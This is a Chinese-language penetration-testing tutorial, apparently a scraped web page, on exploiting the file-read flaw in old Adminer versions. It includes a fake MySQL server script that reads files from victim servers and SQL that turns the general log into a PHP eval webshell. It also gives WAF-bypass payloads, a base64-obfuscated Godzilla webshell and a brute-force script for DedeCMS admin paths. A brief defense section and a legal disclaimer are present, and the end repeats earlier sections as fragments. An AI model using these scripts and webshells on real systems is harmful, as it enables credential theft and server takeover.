Adminer漏洞利用与渗透测试实战教学<\/h1>

一、Adminer漏洞概述<\/h2>
Adminer是一个轻量级的数据库管理工具，低版本存在MySQL服务端恶意读取客户端文件漏洞。攻击者可以利用此漏洞读取服务器上的敏感文件，进而获取数据库凭据或其他关键信息。<\/p>

二、环境准备<\/h2>

1. 所需工具<\/h3>

Python环境<\/li>
requests库<\/li>
socket库<\/li>

可访问的Adminer界面（如adminer.php）<\/li> <\/ul>

2. 漏洞利用前提条件<\/h3>

目标服务器运行低版本Adminer<\/li>
攻击者能够控制或伪造MySQL服务器<\/li>

目标服务器MySQL客户端可连接外部服务器<\/li> <\/ul>

三、漏洞利用步骤详解<\/h2>

1. 识别Adminer存在<\/h3>

http:\/\/target.com\/adminer.php
<\/span><\/span><\/code><\/pre>通过访问常见Adminer路径确认其存在性。<\/p>
2. 搭建恶意MySQL服务器<\/h3>
使用以下Python脚本搭建恶意MySQL服务器（mysql_client.py）：<\/p>
#coding=utf-8 <\/span>
<\/span><\/span>import<\/span> socket
<\/span><\/span>import<\/span> logging
<\/span><\/span>import<\/span> sys
<\/span><\/span>
<\/span><\/span>logging.<\/span>basicConfig(level=<\/span>logging.<\/span>DEBUG)
<\/span><\/span>
<\/span><\/span>filename =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>sv =<\/span> socket.<\/span>socket()
<\/span><\/span>sv.<\/span>setsockopt(1<\/span>, 2<\/span>, 1<\/span>)
<\/span><\/span>sv.<\/span>bind((""<\/span>, 3306<\/span>))
<\/span><\/span>sv.<\/span>listen(5<\/span>)
<\/span><\/span>conn, address =<\/span> sv.<\/span>accept()
<\/span><\/span>logging.<\/span>info('Conn from: <\/span>%r<\/span>'<\/span>, address)
<\/span><\/span>
<\/span><\/span># 发送MySQL握手包<\/span>
<\/span><\/span>conn.<\/span>sendall("<\/span>\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00<\/span>"<\/span>)
<\/span><\/span>conn.<\/span>recv(9999<\/span>)
<\/span><\/span>logging.<\/span>info("auth okay"<\/span>)
<\/span><\/span>
<\/span><\/span># 认证响应<\/span>
<\/span><\/span>conn.<\/span>sendall("<\/span>\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00<\/span>"<\/span>)
<\/span><\/span>conn.<\/span>recv(9999<\/span>)
<\/span><\/span>logging.<\/span>info("want file..."<\/span>)
<\/span><\/span>
<\/span><\/span># 构造文件读取请求<\/span>
<\/span><\/span>wantfile =<\/span> chr(len(filename)+<\/span>1<\/span>) +<\/span> "<\/span>\x00\x00\x01\xFB<\/span>"<\/span> +<\/span> filename
<\/span><\/span>conn.<\/span>sendall(wantfile)
<\/span><\/span>content =<\/span> conn.<\/span>recv(9999<\/span>)
<\/span><\/span>logging.<\/span>info(content)
<\/span><\/span>conn.<\/span>close()
<\/span><\/span><\/code><\/pre>3. 执行文件读取攻击<\/h3>

在攻击服务器上运行恶意MySQL服务器：<\/li>
<\/ol>
python mysql_client.py "F:\\dede\\data\\common.inc.php"<\/span>
<\/span><\/span><\/code><\/pre>
在目标Adminer界面中：<\/li>
<\/ol>

服务器地址填写攻击服务器IP<\/li>
用户名和密码可随意填写<\/li>
点击连接<\/li>
<\/ul>
4. 获取敏感信息<\/h3>
通过读取常见配置文件获取数据库凭据：<\/p>

data\/common.inc.php<\/code> (DedeCMS)<\/li>
wp-config.php<\/code> (WordPress)<\/li>
config\/database.php<\/code> (Laravel)<\/li>
application\/config\/database.php<\/code> (CodeIgniter)<\/li>
<\/ul>
5. 利用获取的凭据登录Adminer<\/h3>
使用读取到的数据库凭据直接登录Adminer，获取完整数据库控制权。<\/p>
四、后续渗透技巧<\/h2>
1. 通过日志写入Webshell<\/h3>
-- 开启general log模式
<\/span><\/span><\/span><\/span>set<\/span> global<\/span> general_log=<\/span>on<\/span>;
<\/span><\/span>
<\/span><\/span>-- 设置日志路径为web目录
<\/span><\/span><\/span><\/span>set<\/span> global<\/span> general_log_file=<\/span>'F:\\webroot\\shell.php'<\/span>;
<\/span><\/span>
<\/span><\/span>-- 写入PHP代码
<\/span><\/span><\/span><\/span>select<\/span> '<?php eval($_POST["pwd"]);?>'<\/span>;
<\/span><\/span><\/code><\/pre>2. 绕过WAF过滤<\/h3>
当直接执行被拦截时，可使用以下方法绕过：<\/p>
-- 使用注释换行绕过
<\/span><\/span><\/span><\/span>select<\/span> '<?php \/\/%0Aphpinfo(); ?>'<\/span>
<\/span><\/span>
<\/span><\/span>-- 使用十六进制编码
<\/span><\/span><\/span><\/span>select<\/span> 0<\/span>x3c3f70687020706870696e666f28293b203f3e
<\/span><\/span>
<\/span><\/span>-- 使用变量拼接
<\/span><\/span><\/span><\/span>set<\/span> @<\/span>a=<\/span>0<\/span>x3c3f70687020706870696e666f28293b203f3e;
<\/span><\/span>select<\/span> @<\/span>a;
<\/span><\/span><\/code><\/pre>3. 写入复杂Webshell（哥斯拉马）<\/h3>
select<\/span> '<?php \/\/"%0A$a="ICAgIHNlc3Npb25fc3RhcnQoKTsKICAgIEBzZXRfdGltZV9saW1pdCgwKTsKCUBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICBmdW5jdGlvbiBFKCRELCRLKXsKICAgICAgICBmb3IoJGk9MDskaTxzdHJsZW4oJEQpOyRpKyspIHsKICAgICAgICAgICAgJERbJGldID0gJERbJGldXiRLWyRpKzEmMTVdOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJEQ7CiAgICB9CiAgICBmdW5jdGlvbiBRKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2VuY29kZSgkRCk7CiAgICB9CiAgICBmdW5jdGlvbiBPKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgkRCk7CiAgICB9CiAgICAkUD0nd2hvYW1pJzsKICAgICRWPSdwYXlsb2FkJzsKICAgICRUPScxYjA2NzliZTcyYWQ5NzZhJzsKICAgIGlmIChpc3NldCgkX1BPU1RbJFBdKSl7CiAgICAgICAgJEY9TyhFKE8oJF9QT1NUWyRQXSksJFQpKTsKICAgICAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRWXSkpewogICAgICAgICAgICAkTD0kX1NFU1NJT05bJFZdOwogICAgICAgICAgICAkQT1leHBsb2RlKCd8JywkTCk7CiAgICAgICAgICAgIGNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIG52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgICAgICAgICAgJFI9bmV3IEMoKTsKCQkJJFItPm52b2tlKCRBWzBdKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwwLDE2KTsKICAgICAgICAgICAgZWNobyBRKEUoQHJ1bigkRiksJFQpKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwxNik7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRfU0VTU0lPTlskVl09JEY7CiAgICAgICAgfQogICAgfQ==";eval%01(base64_decode%01($a));\/\/"; ?>'<\/span>
<\/span><\/span><\/code><\/pre>五、防御措施<\/h2>

升级Adminer<\/strong>：使用最新版本Adminer，已修复此漏洞<\/li>
网络隔离<\/strong>：限制数据库服务器只能连接可信MySQL服务器<\/li>
文件权限<\/strong>：严格限制Web目录和配置文件的读写权限<\/li>
WAF规则<\/strong>：部署Web应用防火墙，拦截异常SQL查询<\/li>
日志监控<\/strong>：监控数据库日志中的异常连接和文件读取操作<\/li>
<\/ol>
六、补充技巧<\/h2>
1. DedeCMS后台发现<\/h3>
当无法直接访问DedeCMS后台时，可使用以下Python脚本暴力猜解后台路径：<\/p>
import<\/span> requests
<\/span><\/span>import<\/span> itertools
<\/span><\/span>
<\/span><\/span>characters =<\/span> "abcdefghijklmnopqrstuvwxyz0123456789_!#"<\/span>
<\/span><\/span>back_dir =<\/span> ""<\/span>
<\/span><\/span>flag =<\/span> 0<\/span>
<\/span><\/span>url =<\/span> "http:\/\/www.test.com\/tags.php"<\/span>
<\/span><\/span>
<\/span><\/span>data =<\/span> {
<\/span><\/span>    "_FILES[mochazz][tmp_name]"<\/span> : ".\/<\/span>{p}<\/span><<\/images\/adminico.gif"<\/span>,
<\/span><\/span>    "_FILES[mochazz][name]"<\/span> : 0<\/span>,
<\/span><\/span>    "_FILES[mochazz][size]"<\/span> : 0<\/span>,
<\/span><\/span>    "_FILES[mochazz][type]"<\/span> : "image\/gif"<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>for<\/span> num in<\/span> range(1<\/span>,7<\/span>):
<\/span><\/span>    if<\/span> flag:
<\/span><\/span>        break<\/span>
<\/span><\/span>    for<\/span> pre in<\/span> itertools.<\/span>permutations(characters,num):
<\/span><\/span>        pre =<\/span> ''<\/span>.<\/span>join(list(pre))
<\/span><\/span>        data["_FILES[mochazz][tmp_name]"<\/span>] =<\/span> data["_FILES[mochazz][tmp_name]"<\/span>].<\/span>format(p=<\/span>pre)
<\/span><\/span>        print("testing"<\/span>,pre)
<\/span><\/span>        r =<\/span> requests.<\/span>post(url,data=<\/span>data)
<\/span><\/span>        if<\/span> "Upload filetype not allow !"<\/span> not<\/span> in<\/span> r.<\/span>text and<\/span> r.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>            flag =<\/span> 1<\/span>
<\/span><\/span>            back_dir =<\/span> pre
<\/span><\/span>            data["_FILES[mochazz][tmp_name]"<\/span>] =<\/span> ".\/<\/span>{p}<\/span><<\/images\/adminico.gif"<\/span>
<\/span><\/span>            break<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            data["_FILES[mochazz][tmp_name]"<\/span>] =<\/span> ".\/<\/span>{p}<\/span><<\/images\/adminico.gif"<\/span>
<\/span><\/span>print("[+] 前缀为："<\/span>,back_dir)
<\/span><\/span>
<\/span><\/span>flag =<\/span> 0<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(30<\/span>):
<\/span><\/span>    if<\/span> flag:
<\/span><\/span>        break<\/span>
<\/span><\/span>    for<\/span> ch in<\/span> characters:
<\/span><\/span>        if<\/span> ch ==<\/span> characters[-<\/span>1<\/span>]:
<\/span><\/span>            flag =<\/span> 1<\/span>
<\/span><\/span>            break<\/span>
<\/span><\/span>        data["_FILES[mochazz][tmp_name]"<\/span>] =<\/span> data["_FILES[mochazz][tmp_name]"<\/span>].<\/span>format(p=<\/span>back_dir+<\/span>ch)
<\/span><\/span>        r =<\/span> requests.<\/span>post(url, data=<\/span>data)
<\/span><\/span>        if<\/span> "Upload filetype not allow !"<\/span> not<\/span> in<\/span> r.<\/span>text and<\/span> r.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>            back_dir +=<\/span> ch
<\/span><\/span>            print("[+] "<\/span>,back_dir)
<\/span><\/span>            data["_FILES[mochazz][tmp_name]"<\/span>] =<\/span> ".\/<\/span>{p}<\/span><<\/images\/adminico.gif"<\/span>
<\/span><\/span>            break<\/span>
<\/span><\/span>        else<\/span>:
<\/span><\/span>            data["_FILES[mochazz][tmp_name]"<\/span>] =<\/span> ".\/<\/span>{p}<\/span><<\/images\/adminico.gif"<\/span>
<\/span><\/span>
<\/span><\/span>print("后台地址为："<\/span>,back_dir)
<\/span><\/span><\/code><\/pre>2. DedeCMS管理员账号猜解<\/h3>
参考链接：http:\/\/www.yulegeyu.com\/2018\/09\/20\/dedecms-guess-admin-username-trick\/<\/p>
通过分析DedeCMS的密码重置机制，可以枚举出存在的管理员用户名。<\/p>
七、总结<\/h2>
本教学详细介绍了如何利用Adminer漏洞进行渗透测试的全过程，从发现Adminer到最终获取服务器权限。关键点包括：<\/p>

搭建恶意MySQL服务器诱导Adminer连接<\/li>
利用漏洞读取服务器敏感文件<\/li>
获取数据库凭据后直接控制数据库<\/li>
通过日志写入Webshell获取服务器权限<\/li>
各种绕过WAF的技术手段<\/li>
<\/ol>
请仅将此技术用于合法授权测试，未经授权的渗透测试可能触犯法律。<\/p>

Adminer漏洞利用与渗透测试实战教学<\/h1>

一、Adminer漏洞概述<\/h2> Adminer是一个轻量级的数据库管理工具，低版本存在MySQL服务端恶意读取客户端文件漏洞。攻击者可以利用此漏洞读取服务器上的敏感文件，进而获取数据库凭据或其他关键信息。<\/p>

二、环境准备<\/h2>

三、漏洞利用步骤详解<\/h2>

5. 利用获取的凭据登录Adminer<\/h3> 使用读取到的数据库凭据直接登录Adminer，获取完整数据库控制权。<\/p>

四、后续渗透技巧<\/h2>

六、补充技巧<\/h2>

2. DedeCMS管理员账号猜解<\/h3> 参考链接：http:\/\/www.yulegeyu.com\/2018\/09\/20\/dedecms-guess-admin-username-trick\/<\/p> 通过分析DedeCMS的密码重置机制，可以枚举出存在的管理员用户名。<\/p>

一、Adminer漏洞概述<\/h2>
Adminer是一个轻量级的数据库管理工具，低版本存在MySQL服务端恶意读取客户端文件漏洞。攻击者可以利用此漏洞读取服务器上的敏感文件，进而获取数据库凭据或其他关键信息。<\/p>

5. 利用获取的凭据登录Adminer<\/h3>
使用读取到的数据库凭据直接登录Adminer，获取完整数据库控制权。<\/p>

2. DedeCMS管理员账号猜解<\/h3>
参考链接：http:\/\/www.yulegeyu.com\/2018\/09\/20\/dedecms-guess-admin-username-trick\/<\/p>
通过分析DedeCMS的密码重置机制，可以枚举出存在的管理员用户名。<\/p>